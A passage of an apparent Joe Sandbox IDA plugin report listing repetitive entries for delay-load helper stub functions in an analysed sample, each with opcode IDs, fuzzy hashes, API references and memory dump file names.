                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 079d83838d894a5c99e3f3c1ae53541432a8a2e1e588031d361c121ef52eb104
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 079d83838d894a5c99e3f3c1ae53541432a8a2e1e588031d361c121ef52eb104
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2f85d9ef67a6587bcbdf3992dfc07485d38d5fc636173e39b982d1d29aa016bb
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f85d9ef67a6587bcbdf3992dfc07485d38d5fc636173e39b982d1d29aa016bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 719eb7389c6823afe2f9c06d9681b61760290d68eae96e0100e369ab7803f284
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 719eb7389c6823afe2f9c06d9681b61760290d68eae96e0100e369ab7803f284
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 050201495174ce215b233a8b4025b50ffc919b0951211fe5abfc29853f2be69f
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 050201495174ce215b233a8b4025b50ffc919b0951211fe5abfc29853f2be69f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 02501a8c6f3ae5fabfa14f32ab633e50fb60dd39619e48208cadfb10c09c7ce1
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02501a8c6f3ae5fabfa14f32ab633e50fb60dd39619e48208cadfb10c09c7ce1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 5ade8af58ba95c611984f791d86dcfc08e10b232eb3eb6f805f028037435cdef
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ade8af58ba95c611984f791d86dcfc08e10b232eb3eb6f805f028037435cdef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 8edef5437e658d082adc9488a92b00a819cff75467d93bb395642e8190a358ee
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8edef5437e658d082adc9488a92b00a819cff75467d93bb395642e8190a358ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 53bb64b023533d88ec28920a36b70c2c3137070123e14617d9bca5909be8513d
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53bb64b023533d88ec28920a36b70c2c3137070123e14617d9bca5909be8513d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ce5c3d703b6c206d910662b496d8cb396206a4878f12153f6c8acc630237f68f
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce5c3d703b6c206d910662b496d8cb396206a4878f12153f6c8acc630237f68f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 60e30e4c1887c6626d7bf6d74a9d3323d68e56734a76455f01ff0fc79aa97a2d
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60e30e4c1887c6626d7bf6d74a9d3323d68e56734a76455f01ff0fc79aa97a2d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    Function 0088E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 09dd4139bb74784a68279acf46b37db75b3241ae63a4588e0fac61de44e67df3
                                                                                                                                                                                                    • Instruction ID: 3fb41b0085fab4451b8e1f0fc12078393d4eec6480d8368392062f477bd3cc88
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09dd4139bb74784a68279acf46b37db75b3241ae63a4588e0fac61de44e67df3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDA001E62A915A7D7108B6556D06C3B021DE9D2B29330952EF825E5A81AC891C451A73
                                                                                                                                                                                                    Function 0088E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0fa6125884c0bd5bbccb90ddc7f839720ea39fc7adb51249dadad5ddec01760b
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fa6125884c0bd5bbccb90ddc7f839720ea39fc7adb51249dadad5ddec01760b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    Function 0088E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 893db725910fb0be2bcdbc9b83207e2ea666f063e881980bd05261169eedad30
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
